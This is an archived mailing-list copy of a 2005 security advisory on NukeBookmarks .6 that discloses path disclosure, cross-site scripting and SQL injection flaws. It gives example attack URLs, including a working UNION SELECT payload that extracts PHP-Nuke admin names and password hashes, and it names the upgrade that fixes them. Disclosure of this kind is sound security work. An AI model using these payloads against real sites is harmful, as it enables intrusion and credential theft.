Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | ZH2005-03SA -- multiple vulnerabilities in NukeBookmarks .6 |
|---|---|
| Date: | 26 Mar 2005 17:17:48 -0000 |
ZH2005-03SA -- multiple vulnerabilities in NukeBookmarks .6 Author: Gerardo 'Astharot' Di Giacomo Date: 26 March 2005 Product: NukeBookmarks .6 URL: http://nukebookmarks.sourceforge.net/ About the product -----------------
From the home page:
"Nuke Bookmarks is a module for PHP-Nuke that allows users to store their own personal bookmarks on the server, much like Yahoo Bookmarks". Vulnerabilities summary ----------------------- 1) Full path disclosure 2) Cross Site Scripting 3) SQL Injection Details ------- 1) Full path disclosure It's possible to retrieve the full installation URL of the website. In "marks.php" file, there are some queries to the database. If some parameters miss or some strange characters are submitted, the functions that get results from the database will return an error. Examples: http://www.nukesite.com/modules.php?name=Bookmarks&file=marks http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&category=1\' 2) Cross Site Scripting Almost all of the variables supplied by the user aren't checked and sanitized. It's possible to inject HTML code into page and do a cross site scripting attack. Examples: http://www.nukesite.com/modules.php?name=Bookmarks&file=del_cat&catname=[htmlcode] http://www.nukesite.com/modules.php?name=Bookmarks&file=del_mark&markname=[htmlcode] http://www.nukesite.com/modules.php?name=Bookmarks&file=edit_cat&catname=[htmlcode] http://www.nukesite.com/modules.php?name=Bookmarks&file=edit_cat&catcomment=[htmlcode] http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=[htmlcode] http://www.nukesite.com/modules.php?name=Bookmarks&file=uploadbookmarks&category=[htmlcode] These other strings are potentially vulnerable but not exploitable: http://www.nukesite.com/modules.php?name=Bookmarks&file=edit_mark&markname=[htmlcode] http://www.nukesite.com/modules.php?name=Bookmarks&file=edit_mark&markurl=[htmlcode] http://www.nukesite.com/modules.php?name=Bookmarks&file=edit_mark&markcomment=[htmlcode] 3) SQL Injection It's possible to get any content from the database by exploiting a SQL Injection vulnerability in "marks.php" file. Example: http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors This example will get the list of PHPNuke authors and the relative hashes of the passwords. Solution -------- Download the latest version of NukeBookmarks (.7). Contacts -------- astharot@zone-h.org http://www.zone-h.org - http://www.zone-h.it Original URL: http://zone-h.org/advisories/read/id=7356
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | phpbb 2.0.13 Exploit (bug), tOnk3r |
|---|---|
| Next by Date: | [Full-disclosure] Re: ZH2005-03SA -- multiple vulnerabilities in NukeBookmarks .6, Paul Laudanski |
| Previous by Thread: | phpbb 2.0.13 Exploit (bug), tOnk3r |
| Next by Thread: | [Full-disclosure] Re: ZH2005-03SA -- multiple vulnerabilities in NukeBookmarks .6, Paul Laudanski |
| Indexes: | [Date] [Thread] [Top] [All Lists] |